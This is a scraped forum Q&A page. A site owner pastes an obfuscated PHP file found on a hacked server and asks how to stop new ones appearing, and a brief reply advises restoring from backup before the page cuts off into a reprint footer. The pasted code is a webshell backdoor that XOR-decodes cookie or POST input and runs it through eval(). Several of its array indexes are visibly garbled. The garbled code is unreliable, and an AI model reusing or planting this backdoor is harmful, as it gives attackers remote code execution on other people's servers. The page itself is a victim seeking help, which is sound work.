I am facing with an issue. Everyday on my server appers .ico files and .php file with this kind of code:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11 ];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}
Could you please tell me what should I do? I am using rackspace hosting. Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log. How can I stop that?
Thanks in advance!
Hacked. I was recently cleaning hacked site my self and it was nightmare. Best would be to retrieve some recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.